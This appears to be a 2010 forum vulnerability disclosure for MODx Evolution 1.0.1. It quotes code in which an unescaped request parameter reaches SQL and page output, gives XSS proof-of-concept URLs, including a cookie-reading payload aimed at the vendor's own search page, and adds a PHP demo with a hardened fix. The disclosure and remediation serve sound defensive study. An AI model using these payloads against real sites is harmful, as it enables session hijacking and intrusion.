
17.08.2010, 04:02
MODx Evolution CMS
Version 1.0.1 (download: http://modxcms.com/download/rc/MODx-1.0.1-rc-1.tar.gz )
XSS (requires admin rights)
\manager\includes\accesscontrol.inc.php
PHP code:
$itemid = isset($_REQUEST['id']) ? $_REQUEST['id'] : '';
$lasthittime = time();
$action = isset($_REQUEST['a']) ? $_REQUEST['a'] : '1';   // 'a' is taken straight from the request
if ($action != '1') {
    if (!intval($itemid)) $itemid = null;
    $sql = sprintf('REPLACE INTO %s (internalKey, username, lasthit, action, id, ip)
        VALUES (%d, \'%s\', \'%d\', \'%s\', %s, \'%s\')',
        $modx->getFullTableName('active_users'), // Table
        $modx->getLoginUserID(),
        $_SESSION['mgrShortname'],
        $lasthittime,
        (string)$action,                          // formatted with '%s', no escaping
        var_export($itemid, true),
        $ip
Result:
http://localhost/modx-1.0.1-rc-1/manager/index.php?a=2'>alert(010101)
+
XSS on the official site:
http://modxcms.com/searchresults.html
Enter:
">alert(document.cookie)
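The request-to-SQL path visible in the quoted accesscontrol.inc.php snippet, as an added example that is not MODx code: the `a` parameter is formatted into the statement with `'%s'` and no escaping, so a quote-free payload is stored and comes back as markup wherever the active-users table is rendered, and a payload with a quote (as in the URL above) alters the statement itself. The in-memory SQLite table, the `renderActiveUsers` step and all sample inputs are assumptions constructed for the demonstration; only the column names follow the snippet.

```php
<?php
// Added example, not code from MODx: models the $_REQUEST['a'] -> sprintf -> SQL
// path quoted above on an in-memory SQLite table and shows a hardened version.
// Column names follow the quoted snippet; the "active users" rendering step and
// all sample inputs are constructed for illustration.
declare(strict_types=1);

function setupDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE active_users (internalKey INTEGER PRIMARY KEY,
        username TEXT, lasthit INTEGER, action TEXT, id INTEGER, ip TEXT)');
    return $db;
}

// Mirrors the quoted code: $action is formatted with '%s' and no escaping, so
// whatever arrives in ?a= is placed into the statement verbatim.
function buildSqlVulnerable(array $request, int $userId, string $user, string $ip): string {
    $itemid = $request['id'] ?? '';
    $action = $request['a'] ?? '1';
    if (!intval($itemid)) {
        $itemid = null;
    }
    return sprintf("REPLACE INTO active_users (internalKey, username, lasthit, action, id, ip)
        VALUES (%d, '%s', '%d', '%s', %s, '%s')",
        $userId, $user, time(), (string) $action, var_export($itemid, true), $ip);
}

// Hardened: a manager action is a small integer, so reject anything else before
// it reaches the query, and bind every value instead of formatting it in.
function recordHitHardened(PDO $db, array $request, int $userId, string $user, string $ip): void {
    $action = (string) ($request['a'] ?? '1');
    if (!ctype_digit($action)) {
        throw new InvalidArgumentException('action must be numeric');
    }
    $itemid = (string) ($request['id'] ?? '');
    $itemid = ctype_digit($itemid) && (int) $itemid > 0 ? (int) $itemid : null;
    $stmt = $db->prepare('REPLACE INTO active_users (internalKey, username, lasthit, action, id, ip)
        VALUES (:key, :user, :hit, :action, :id, :ip)');
    $stmt->execute([':key' => $userId, ':user' => $user, ':hit' => time(),
                    ':action' => (int) $action, ':id' => $itemid, ':ip' => $ip]);
}

// Output side (assumed rendering step): with $encode the stored action is
// HTML-encoded, so a stored payload is emitted as text rather than markup.
function renderActiveUsers(PDO $db, bool $encode): string {
    $html = '';
    foreach ($db->query('SELECT username, action FROM active_users') as $row) {
        $a = $encode ? htmlspecialchars($row['action'], ENT_QUOTES, 'UTF-8') : $row['action'];
        $html .= '<tr><td>' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8')
               . "</td><td>$a</td></tr>\n";
    }
    return $html;
}

// Demo with constructed inputs.
$db = setupDb();

// 1. A quote-free payload survives the sprintf, is stored, and is emitted
//    raw by the unencoded rendering; the encoded rendering neutralises it.
$xss = ['a' => '2<svg onload=alert(1)>'];
$db->exec(buildSqlVulnerable($xss, 1, 'admin', '127.0.0.1'));
echo renderActiveUsers($db, false);
echo renderActiveUsers($db, true);

// 2. A payload containing a quote, as in the post's URL, terminates the '%s'
//    string literal and changes the statement itself.
echo buildSqlVulnerable(['a' => "2'>alert(1)"], 1, 'admin', '127.0.0.1'), "\n";

// 3. The hardened path rejects both before any SQL is built.
foreach ([$xss, ['a' => "2'>alert(1)"]] as $req) {
    try {
        recordHitHardened($db, $req, 1, 'admin', '127.0.0.1');
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Run with `php example.php` (needs the pdo_sqlite extension). The two fixes are independent and both are needed: binding parameters closes the SQL side, while encoding on output is what prevents a value that was stored legitimately from executing as script in the manager.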